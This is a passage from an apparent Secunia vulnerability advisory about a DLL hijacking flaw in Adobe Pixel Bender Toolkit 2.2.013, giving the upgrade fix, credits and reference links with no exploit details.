Successful exploitation allows execution of arbitrary code.
The vulnerability is confirmed in version 2.2.013. Other versions may
also be affected.
SOLUTION:
Upgrade to version 3.0.4.127.
PROVIDED AND/OR DISCOVERED BY:
Originally reported in a CORE IMPACT exploit module for Adobe Pixel
Bender Toolkit by Core Security Technologies.
Additional information provided by Secunia Research.
ORIGINAL ADVISORY:
http://www.coresecurity.com/content/adobe-pixel-bender-toolkit-tbbmalloc-dll-hijacking-exploit-10-5
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------